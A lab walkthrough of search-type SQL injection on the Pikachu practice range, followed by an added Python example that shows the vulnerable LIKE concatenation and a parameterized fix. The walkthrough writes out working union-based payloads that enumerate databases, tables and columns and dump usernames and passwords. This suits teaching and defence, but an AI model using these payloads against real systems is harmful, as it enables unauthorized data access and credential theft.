Pikachu range: SQL injection, search-type injection walkthrough steps
2022-07-23 07:04:00 【Chang Jiazhuang】
First of all, understand the MySQL fuzzy search statements: like 'often%', like '%often', like '%often%'. I won't go into detail here.
Determine the injection point
I don't know how to write code. You can try the following statements
This is the search injection statement I use:
v%' and -1=-1 -- bbq
Search-type injection statements found on the Internet:
'and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='
An error is reported when the single quotation mark is closed, which probably means the pattern is %xx% or xx%.
Go directly to the process diagram:
Determine how many fields there are
It's closed 4 individual, move the picture up:
Show obvious dislocation

Querying the current database
version() returns the database version; database() returns the current database.
v%' union select version(),database(),33 -- bbq

Query all tables in the database
If there are many tables and the page displays them incompletely, you can use LIMIT to page through them, or use the group_concat() concatenation function to combine the displayed field names into one value.
v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq

Query the column names in the specified table
The next step after querying the table names is to query the fields, that is, the column names.
v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq

Query data
After the above steps, we already know the database name, table name, and field names, so we can query the data we need.
v%' union select username,password,33 from users -- bbq
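Why the statements above work, and the fix, shown as an added example that is not code from the original post or from Pikachu: the search term is concatenated into the LIKE pattern, so a quote ends the string literal, while a bound parameter with escaped wildcards keeps the same input as data. It assumes SQLite as a stand-in for MySQL, and the member table, its columns and all rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; the member table and its columns are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE member(id INTEGER, username TEXT, email TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO member VALUES (1, 'vince', 'vince@example.test'),
                                  (2, 'kobe', 'kobe@example.test');
        INSERT INTO users VALUES ('admin', '<constructed-hash>');
    """)
    return db

def search_vulnerable(db, term):
    # The term is pasted inside '%...%': a single quote in it closes the
    # literal and the rest of the input is parsed as SQL.
    sql = ("SELECT username, id, email FROM member "
           "WHERE username LIKE '%" + term + "%'")
    return db.execute(sql).fetchall()

def search_safe(db, term):
    # Escape LIKE wildcards so % and _ match literally, then bind the
    # whole pattern as a parameter instead of building SQL text.
    esc = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT username, id, email FROM member "
           "WHERE username LIKE ? ESCAPE '\\'")
    return db.execute(sql, ("%" + esc + "%",)).fetchall()

# The last statement from the walkthrough, used here as test input.
PAYLOAD = "v%' union select username,password,33 from users -- bbq"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))
    print("safe:      ", search_safe(db, PAYLOAD))
    print("safe 'v':  ", search_safe(db, "v"))
```

The bound version also stops a bare % from matching every row, which the concatenated query allows.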
